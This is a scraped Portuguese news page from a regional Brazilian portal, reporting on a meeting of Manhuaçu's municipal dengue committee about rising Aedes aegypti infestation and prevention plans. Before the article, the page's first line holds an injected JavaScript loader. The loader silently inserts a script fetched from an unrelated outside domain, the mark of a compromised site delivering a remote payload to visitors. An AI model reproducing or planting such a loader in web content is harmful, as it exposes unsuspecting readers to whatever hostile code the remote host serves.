;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Manhuaçu-Comitê Municipal Permanente de Combate à Dengue se reune novamente. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Manhuaçu-Comitê Municipal Permanente de Combate à Dengue se reune novamente.

A época de estiagem chegou, mas o problema da dengue continua. O Comitê de Combate a Dengue se reuniu na ultima segunda-feira, 22, para planejar ações de enfrentamento a este mal.
A criação do Comitê Municipal Permanente de Combate à Dengue e outras possíveis doenças epidêmicas, foi decretado pelo Prefeito Nailton Heringer, este é composto por empresários e lideranças da sociedade, que são voluntários e estão diretamente envolvidos para lutar pelo bem estar social.
A REUNIÃO
Durante a reunião, a Coordenadora da Vigilância Ambiental, Emilce Estanislau Fialho, apresentou os resultados do LIRa – Levantamento Rápido do Índice de Infestação por Aedes aegypti, feito em Manhuaçu e o quadro infestação que era de 1,4% em março, dobrou em abril atingindo o percentual de 2,8%. Confirmando que é necessária uma enorme força tarefa para eliminar a dengue do nosso meio.
Nesse período foi solicitado um UBV pesado, conhecido como fumasse, o qual não foi liberado pela Secretaria Estadual de Saúde, pois havia em nossa região cidades em pior situação que Manhuaçu com casos de infestação superiores a 6%. A Coordenadora da Vigilância Ambiental, Emilce, enfatizou que somente o fumasse não resolve, pois mata apenas os mosquitos adultos. Para acabar com o Aedes Aegypti, a população deve participar ativamente informando a Vigilância Ambiental possíveis criadouros.
Em Manhuaçu, mais de 30% dos criadouros estão nas residências. Então, o próximo passo agora é trabalhar a prevenção. O mosquito precisa de agua e calor para se reproduzir e estamos em uma estação que não é favorável a ele. Vale lembrar que o ovo sobrevive 485 dias ante de eclodir. Então, se não for eliminado nesse período, no próximo ano ele irá retornar.
A próxima reunião está marcada para o dia 06 de maio, segunda-feira, às 18h, no Centro Cultural, e terá como foco principal a Prevenção e Mobilização.


Secretaria Municipal de Comunicação Social de Manhuaçu

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.